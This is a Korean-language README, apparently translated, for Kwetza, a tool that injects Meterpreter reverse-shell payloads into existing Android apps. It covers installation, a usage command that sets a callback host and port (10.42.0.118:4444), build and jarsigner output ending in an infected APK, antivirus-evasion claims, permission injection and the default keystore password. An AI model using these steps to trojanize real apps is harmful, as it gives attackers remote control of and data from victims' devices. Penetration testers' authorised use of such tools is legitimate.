
Python 스크립트로, 기존 Android 애플리케이션에 Meterpreter 페이로드를 주입합니다.
크리스 르 로이(@brompwnie) [email protected] 작성
Kwetza는 기존 안드로이드 애플리케이션에 Meterpreter 페이로드를 감염시킬 수 있는 도구입니다.
Kwetza는 기존 안드로이드 애플리케이션에 사용자 정의 또는 기본 페이로드 템플릿을 주입하여 안티바이러스 탐지를 회피합니다. Kwetza는 대상 애플리케이션의 기본 권한을 사용하거나 추가 권한을 주입하여 추가 기능을 얻을 수 있도록 합니다.
Kwetza가 자동화한 수동 단계는 여기에서 확인할 수 있습니다: https://sensepost.com/blog/2016/kwetza-infecting-android-applications/
먼저 코드를 가져옵니다:
git clone https://github.com/sensepost/kwetza.git
Kwetza는 Python으로 작성되었으며 Pip을 사용하여 설치할 수 있는 BeautifulSoup가 필요합니다:
pip install beautifulsoup4
Kwetza는 Apktool이 설치되어 PATH를 통해 접근 가능해야 합니다. 이는 다음 설치 지침을 사용하여 설정할 수 있습니다: https://ibotpeaches.github.io/Apktool/install
python kwetza.py nameOfTheApkToInfect.apk https/tcp LHOST LPORT yes/no customClass
python kwetza.py hackme.apk https 10.42.0.118 4444 yes com.moo.another.activity
[+] MMMMMM KWETZA
[*] DECOMPILING TARGET APK
[+] ENDPOINT IP: 10.42.0.118
[+] ENDPOINT PORT: 4444
[+] APKTOOL DECOMPILED SUCCESS
[*] BYTING COMMS...
[*] ANALYZING ANDROID MANIFEST...
[+] TARGET ACTIVITY: com.foo.moo.gui.MainActivity
[*] INJECTION INTO APK
[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED
[*] INJECTION OF CRAZY PERMS TO BE DONE!
[+] TIME TO BUILD INFECTED APK
[*] EXECUTING APKTOOL BUILD COMMAND
[+] BUILD RESULT
############################################
I: Using APktool 2.2.0
I: Checking whether source shas changed...
I: Smaling smali folder into classes.dex
I: Checking whether resources has changed...
I: Building resources...
I: Copying libs ...(/lib)
I: Building apk file...
I: Copying unknown files/dir...
###########################################
[*] EXECUTING JARSIGNER COMMAND...
Enter Passphrase for keystore: password
[+] JARSIGNER RESULT
###########################################
jar signed.
###########################################
[+] L00t located at hackme/dist/hackme.apk
Kwetza는 Python 2에서 작동하도록 개발되었습니다.
Kwetza는 기본적으로 "payload" 폴더에 있는 템플릿과 키스토어를 사용하여 감염된 APK를 주입하고 서명합니다.
감염된 애플리케이션을 자신의 인증서로 서명하려면 새 키스토어를 생성하여 "payload" 폴더에 넣고 기존 키스토어의 이름을 바꾸거나 kwetza.py의 참조를 변경하십시오.
페이로드 템플릿에 대해서도 동일하게 수행할 수 있습니다.
기본 키스토어의 비밀번호는 'password'입니다.
Kwetza는 크리에이티브 커먼즈 저작자표시-비영리-동일조건변경허락 4.0 국제 라이선스(http://creativecommons.org/licenses/by-nc-sa/4.0)에 따라 사용이 허가됩니다.
이 라이선스 범위를 초과하는 권한은 http://sensepost.com/contact에서 확인할 수 있습니다.